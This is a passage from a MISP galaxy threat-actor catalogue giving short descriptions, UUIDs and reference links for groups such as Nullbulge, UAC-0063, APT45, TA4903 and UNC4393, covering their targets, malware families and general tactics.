in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Nullbulge
NullBulge is a cybercriminal threat group targeting AI and gaming focused entities. They weaponize code in publicly available repositories to distribute malware, including LockBit ransomware. The group claims to be motivated by a pro-art, anti-AI cause, but their activities indicate a financial focus. NullBulge uses obfuscated code in public repositories and malicious mods to target their victims.
Internal MISP references
UUID 000d8bbf-cb6f-4f7b-89a4-9c136ac4bc5a
which can be used as unique global reference for Nullbulge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Threat Actor 888
Threat Actor 888 is a hacker active in 2024, targeting companies for data breaches. They have hit Microsoft, BMW (Hong Kong), and others in the tech, freight, and oil and gas industries.
Internal MISP references
UUID 8f31b9b1-44c9-4b7f-b850-7cf02c306e25
which can be used as unique global reference for Threat Actor 888
in MISP communities and other software using the MISP galaxy
External references
- https://cybersecuritynews.com/threats-claimimg-breach/ - webarchive
- https://www.cloudways.com/blog/hacker-allegedly-leaks-data-from-shopify-breach-on-breachforums/ - webarchive
- https://twitter.com/H4ckManac/status/1810569160180515171 - webarchive
- https://medium.com/@DoingFedTime/80-000-records-exposed-in-shell-data-breach-by-threat-actor-888-64c407dfac94 - webarchive
Associated metadata
Metadata key | Value |
---|---|
UAC-0063
UAC-0063 is a threat actor linked to Russian APT28, known for targeting government entities in Ukraine and Central Asia for cyber espionage operations. They utilize keyloggers, backdoors, and malware like Hatvibe and Cherryspy to compromise systems and exfiltrate sensitive information. The group has been active since at least 2021 and has shown interest in targeting organizations in Mongolia, Kazakhstan, Kyrgyzstan, Israel, and India. Their TTPs include spear-phishing campaigns and exploiting vulnerabilities in software products like HFS HTTP File Server and Rejetto file-sharing servers.
Internal MISP references
UUID 9565bf78-7c9c-41cd-9ed0-58031f6d8978
which can be used as unique global reference for UAC-0063
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Stargazer Goblin
Stargazer Goblin is a threat actor group that operates the Stargazers Ghost Network on GitHub, distributing malware and malicious links through multiple accounts. They utilize compromised and created accounts to evade detection and quickly replace banned components to continue their operations. The group has been estimated to have earned approximately $100,000 from their malicious activities, offering a Distribution as a Service platform for other threat actors to distribute their malware. Stargazer Goblin has been involved in distributing various malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.
Internal MISP references
UUID a86e4a0d-95cf-4ce0-b26c-d1fbb7cc84bc
which can be used as unique global reference for Stargazer Goblin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0102
UAC-0102 is a threat actor group targeting UKR.NET users through phishing attacks. They distribute emails with HTML file attachments that redirect users to a fraudulent website to steal authentication data. Security teams can use Sigma rules to detect their phishing campaigns and leverage IOCs provided by CERT-UA to hunt for their activity in SIEM or EDR environments.
Internal MISP references
UUID 7dd2e8ee-4232-43f5-9866-006160f19aea
which can be used as unique global reference for UAC-0102
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT45
APT45 is a North Korean cyber threat actor that has been active since at least 2009. They have conducted espionage campaigns targeting government agencies and defense industries, as well as financially-motivated operations, including ransomware development. APT45 has targeted critical infrastructure, financial organizations, nuclear research facilities, and healthcare and pharmaceutical companies. They use a mix of publicly available tools, modified malware, and custom malware families in their operations.
Internal MISP references
UUID 02768be6-853c-4239-8fb1-823427489a86
which can be used as unique global reference for APT45
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KP |
TA4903
TA4903 is a financially motivated threat actor known for conducting credential phishing and business email compromise campaigns. They target organizations in the U.S. across various sectors, spoofing government entities and private businesses. The actor has been observed using techniques such as QR codes in phishing campaigns and spoofing supplier domains to prompt victims to provide banking information. TA4903's activities typically involve stealing corporate credentials to facilitate follow-on BEC activities.
Internal MISP references
UUID 1725e1c3-9870-4f66-8962-753c4ed3e086
which can be used as unique global reference for TA4903
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0506
Storm-0569 is an initial access broker that distributes BATLOADER using search engine optimization (SEO) poisoning with websites that spoof Zoom, TeamViewer, Tableau, and AnyDesk. It uses the loader malware to inject the Cobalt Strike payload and transfers access to Storm-0506 for the deployment of the Black Basta ransomware.
Internal MISP references
UUID d1ad4392-c85a-4f07-9818-a86f805a49f6
which can be used as unique global reference for Storm-0506
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SAMBASPIDER
SAMBASPIDER is a threat actor associated with the Mispadu malware. On July 24, USDoD allegedly scraped and leaked a 100,000-line Indicator of Compromise list from CrowdStrike, revealing detailed threat intelligence data. The leak, posted on Breach Forums, includes critical insights into the Mispadu malware and the SAMBASPIDER threat actor.
Internal MISP references
UUID 0b71d2db-93fe-49b5-a9fd-7f8c94b86637
which can be used as unique global reference for SAMBASPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC4393
UNC4393 is a financially motivated threat actor primarily using BASTA ransomware. They have been active since early 2022 and have targeted over 40 organizations across various industries. UNC4393 has shown a willingness to cooperate with other threat clusters for initial access and has evolved from using existing tools to developing custom malware. They focus on efficient data exfiltration and multi-faceted extortion, often utilizing tools like COGSCAN and RCLONE for reconnaissance and data theft.
Internal MISP references
UUID 8191e28a-fb2d-4d50-b992-b877807a2f37
which can be used as unique global reference for UNC4393
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Hive0137
Being one of the most active malware distributors, Hive0137 demonstrates a willingness to explore new payloads and technologies such as GenAI. They have quickly moved onto the same level as other high-profile distributors such as TA577, and will likely be responsible for future phishing campaigns, facilitating initial access for ransomware affiliates. Hive0137’s combination of intent, capabilities and relationships with other groups presents a direct threat to organizations all over the world. As threat actors pick up the pace and increasingly adopt AI technologies for malicious purposes, it is important that organizations are aware of the most recent threats and their capabilities to maintain a strong security posture.
Internal MISP references
UUID 34f2d3ad-e367-4058-a10b-1f7a4274c418
which can be used as unique global reference for Hive0137
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|